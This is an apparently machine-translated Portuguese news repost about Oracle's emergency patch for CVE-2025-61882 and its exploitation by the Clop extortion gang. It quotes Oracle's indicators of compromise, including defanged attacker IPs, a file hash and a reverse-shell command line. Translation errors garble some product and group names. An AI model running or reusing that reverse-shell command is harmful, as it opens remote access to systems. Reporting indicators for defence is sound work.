⚡ Não perca: notícia importante no ar! ⚡

Confira agora e compartilhe com seus amigos!

Apoie esse projeto de divulgacao de noticias! Clique aqui
O Oracle está alertando sobre uma vulnerabilidade crítica do E-Business Suite de Dia zero rastreado como CVE-2025-61882 que permite que os invasores realizem execução remota de código remoto não autenticado, com a falha ativamente explorada em ataques de roubo de dados.

A falha está dentro do produto de processamento simultâneo do Oracle do Oracle E-Business Suite (Component: BI Publisher Integration) e possui uma pontuação base do CVSS de 9,8, devido à sua falta de autenticação e facilidade de exploração.

"Este alerta de segurança aborda a vulnerabilidade CVE-2025-61882 no Oracle E-Business Suite", lê um novo consultivo da Oracle.

"Essa vulnerabilidade é remotamente explorável sem autenticação, ou seja, pode ser explorada em uma rede sem a necessidade de um nome de usuário e senha. Se explorar com sucesso, essa vulnerabilidade pode resultar em execução remota de código".

O Oracle confirmou que a vulnerabilidade do dia zero afeta o Oracle E-Business Suite, versões 12.2.3-12.2.14, e lançou uma atualização de emergência para resolver a falha. A empresa observa que os clientes devem primeiro instalar a atualização crítica do patch de outubro de 2023 antes de poder instalar as novas atualizações de segurança.

Como existe uma exploração pública POC e a falha é ativamente explorada, é crucial que os administradores da Oracle instalem a atualização de segurança o mais rápido possível.

Dias zero explorados em ataques de roubo de dados CLOP

Embora o Oracle não tenha declarado explicitamente que essa é uma vulnerabilidade de dias zero, eles compartilharam indicadores de compromisso que correspondem a uma exploração do Oracle EBS recentemente compartilhada por atores de ameaças no telegrama. 

Charles Carmakal, CTO, Mandiant - Google Cloud, também confirmou que essa era a falha explorada pela gangue de ransomware de clop em ataques de roubo de dados que ocorreram em agosto de 2025.

"Clop explorou várias vulnerabilidades no Oracle EBS, o que lhes permitiu roubar grandes quantidades de dados de várias vítimas em agosto de 2025", compartilhou Carmakal em comunicado ao BleepingComputer.

"Múltiplas vulnerabilidades foram exploradas, incluindo vulnerabilidades que foram corrigidas na atualização de julho de 2025 da Oracle, bem como uma que foi corrigida neste fim de semana (CVE-2025-61882)", continuou Carmakal.

CVE-2025-61882 é uma vulnerabilidade crítica (9,8 CVSS) que permite a execução de código remoto não autenticado.

As notícias da mais recente campanha de extorsão de Clop foram divulgadas pela primeira vez na semana passada, quando Mandiant e o Google Ameak Intelligence Group (GTIG) relataram que estavam rastreando uma nova campanha na qual várias empresas receberam e -mails que alegavam ser dos atores de ameaças.

Esses e-mails afirmaram que a CLOP havia roubado dados dos sistemas de suíte de e-business da Oracle da empresa e estava exigindo um resgate para não vazar os dados roubados.

"Somos equipes CL0P. Se você não ouviu falar de nós, pode pesquisar no Google sobre nós na Internet", lê o email de extorsão compartilhado com o BleepingComputer.

"Recentemente, violamos o seu aplicativo Oracle E-Business Suite e copiamos muitos documentos. Todos os arquivos privados e outras informações agora são mantidos em nossos sistemas".

CLOP EXTORTION E -mailSource: Google

A gangue de extorsão Clop tem uma longa história de explorar vulnerabilidade de dias zero em ataques maciços de roubo de dados, que incluem:

2020: Explorando um dia zero na plataforma FTA da Acelion, afetando quase 100 organizações.

2021: Explorando um dia zero no software Solarwinds Serv-U FTP.

2023: Explorando um dia zero na plataforma MFT Goanywhere, violando mais de 100 empresas.

2023: Explorar um dia zero na transferência de movimentação foi a campanha mais extensa de Clop até o momento, onde uma exploração de dia zero permitiu roubo de dados de 2.773 organizações em todo o mundo.

2024: Explorou duas transferências de arquivo CLEO zero-dias (CVE-2024-50623 e CVE-2024-55956) para roubar dados e extorquir empresas.

Clop mais tarde confirmou ao BleepingComputer que eles estavam por trás dos e-mails de extorsão e indicaram que exploraram uma vulnerabilidade do Oracle Zero Day para roubar os dados.

"Em breve tudo ficará óbvio que a Oracle incorporou seu produto principal e mais uma vez, a tarefa está em Clop para salvar o dia", disse Clop ao BleepingComputer, indicando que uma nova falha foi explorada.

No entanto, o Oracle vinculou inicialmente a campanha de extorsão CLOP às vulnerabilidades que foram corrigidas em julho de 2025, em vez do novo dia zero que agora sabemos que foi usado nos ataques.

A Oracle agora compartilhou indicadores de compromisso para a exploração de dia zero, que incluem dois endereços IP vistos explorando servidores, um comando para abrir um shell remoto e o arquivo de exploração e arquivos associados.

200 [.] 107 [.] 207 [.] 26 - Endereço IP associado à exploração observada. (Http get and post solicitações)

185 [.] 181 [.] 60 [.] 11 - Endereço IP associado à exploração observada. (Http get and post solicitações)

sh -c/bin/bash -i> &/dev/tcp // 0> & 1 -Comando executado pela exploração para abrir um shell reverso.

76B6D36E04E367A2334C445B51E1ECCE97E4C614E88DFB4F72B104CA0F31235D - ORACLE_EBS_NDAY_EXPLOIT_POC_SCATTEND_LAPS_RETA_CL0P_NDAY_EXPLOIT_POC_SCATTEN
Siga Canal Fsociety para mais novidades:
Instagram | Facebook | Telegram | Twitter
#samirnews #samir #news #boletimtec #oracle #patches #ebsdia #zero #explorado #em #ataques #de #roubo #de #dados #clop
💡 Compartilhe e ajude nosso projeto a crescer!

Post a Comment